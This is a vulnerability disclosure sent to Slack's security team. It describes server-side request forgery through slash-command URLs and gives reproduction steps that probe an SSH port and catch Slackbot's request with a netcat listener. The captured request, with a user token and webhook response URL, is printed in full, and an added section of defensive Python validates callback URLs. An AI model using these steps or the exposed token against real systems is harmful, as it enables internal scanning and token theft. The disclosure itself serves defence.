SSRF (Server Side Request Forgery) on slack.com – SQLi Basic

Hi Slack Security Team,

This is Shaifullah Shaon (Black_EyE), an ethical hacker
and white-hat cyber security researcher from Bangladesh, reporting a serious
security vulnerability [3rd ranking in OWASP] on your system.

I found a technical security bug called “SSRF (Server Side Request Forgery) on slack.com”.

I have exploited it. To verify further, you can watch my video PoC, which is unlisted on my YouTube channel.

Follow along with me:

1. I already opened my account.
2. I created an app, which I installed into my cheat box.
3. Now I use a /command for which I set the URL http://scanme.nmap.org:22.
4. Now I type /comma (the slash command) in the message box.
   SSRF Testing APP 10:39 AM
   Only visible to you
   SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
   As you see, here it is showing the OpenSSH version.
5. Now I change the website URL from http://scanme.nmap.org:22 to 31.208.61.136 (this is my own SSH server) and use my port 55.
6. Now I again type /comma (the slash command) in the message box.
7. As you see here, the Slack message box shows me 503 (Timeout was reached). But here, look at my SSH server: I was forwarding my port 55 using netcat.
    nc -lnvvp 55
    listening on [::]:55 …
   Here the port was listening. Now, when I see the 503 (Timeout was reached) in the message box, here I get a user token from your server:
   token=KYfpmy2m8mSBrElI1lB8SR8a&team_id=T699WGVQS&team_domain=testdevopsdaveteam&channel_id=D6AKZDF6W&channel_name=directmessage&
   user_id=U6APVADK7&user_name=testingfuck&command=%2Fcomma&text=&
   response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT699WGVQS%2F215699702339%2F1OUns1YkN1jhXulMpjHVgG5x

POST / HTTP/1.1
User-Agent: Slackbot 1.0 (+https://api.slack.com/robots)
Accept-Encoding: gzip,deflate
Accept: application/json,*/*
Content-Length: 298
Content-Type: application/x-www-form-urlencoded
Host: 31.208.61.136:55
Cache-Control: max-age=259200
Connection: keep-alive

token=KYfpmy2m8mSBrElI1lB8SR8a&team_id=T699WGVQS&team_domain=testdevopsdaveteam&channel_id=D6AKZDF6W&channel_name=directmessage&user_id=U6APVADK7&user_name=testingfuck&command=%2Fcomma&text=&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT699WGVQS%2F215699702339%2F1OUns1YkN1jhXulMpjHVgG5x
** Note: An attacker can steal a user token using this issue.
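The following is an added example, not code from the original report and not Slack's own code. It shows two defensive checks a platform can apply against the behaviour described above: validating the request URL an app registers for a slash command (the report points it at scanme.nmap.org:22 and then at 31.208.61.136:55), and refusing to relay anything to the user that is not a JSON response (the report shows a raw SSH banner being echoed into the message box). The function names, the allowed-port policy and the sample inputs are assumptions constructed for this example.

```python
# Added example: defensive checks for an app-registered slash-command URL and
# for what is relayed back to the user. Not Slack's code; the policy below
# (https only, default port only, public addresses only) is an assumption.
import ipaddress
import json
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}
ALLOWED_PORTS = {None, 443}  # None means the scheme's default port


def validate_request_url(url):
    """Return (ok, reason) for a callback URL registered by a third-party app.

    Rejects plain http, non-default ports (which would let the callback act
    as a port scanner, as with scanme.nmap.org:22 and 31.208.61.136:55 in the
    report) and literal addresses that are not publicly routable.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme must be https"
    try:
        host, port = parts.hostname, parts.port  # .port raises on a bad port
    except ValueError:
        return False, "malformed host or port"
    if not host:
        return False, "missing host"
    if port not in ALLOWED_PORTS:
        return False, "port %r not allowed; only the default https port" % port
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name. Resolve it and re-run this check on the resolved
        # address immediately before connecting (guards DNS rebinding).
        ip = None
    if ip is not None and not ip.is_global:
        return False, "literal address is not publicly routable"
    if host.lower() == "localhost":
        return False, "loopback host name"
    return True, "ok"


def relay_guard(content_type, body):
    """Return the JSON object to show the user, or None for a generic error.

    Anything that is not a JSON object (an SSH banner such as
    "SSH-2.0-OpenSSH_..." read from a non-HTTP port, an HTML error page,
    a bare list) is dropped, so the callback cannot be used to read
    service banners back through the message box.
    """
    if content_type is None:
        return None
    if content_type.split(";")[0].strip().lower() != "application/json":
        return None
    try:
        parsed = json.loads(body)
    except ValueError:  # includes UnicodeDecodeError for non-UTF-8 bytes
        return None
    return parsed if isinstance(parsed, dict) else None


if __name__ == "__main__":
    # Constructed sample inputs, including the two URLs from the report.
    for candidate in (
        "http://scanme.nmap.org:22",
        "http://31.208.61.136:55",
        "https://scanme.nmap.org:22",
        "https://127.0.0.1/hook",
        "https://example.com/slack/command",
    ):
        print(candidate, "->", validate_request_url(candidate))
    banner = b"SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8"  # constructed
    print("banner relayed:", relay_guard("text/plain", banner))
    print("json relayed:", relay_guard("application/json", b'{"text": "ok"}'))
```

The URL check only looks at the literal host; for a DNS name the resolved address has to be checked again at connection time, otherwise a name that later resolves to an internal address slips past. The relay guard is deliberately strict: when the upstream did not answer with a JSON object, the user sees a generic error rather than whatever bytes came back.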

Please see my video PoC to understand clearly. Hopefully these are very critical issues.
Resolve these issues as soon as possible.

Here is the video proof of concept (unlisted): https://youtu.be/REV3IG5qGFc

Thank you
Shaifullah Shaon (Black_EyE)
shaon.durjoy@gmail.com
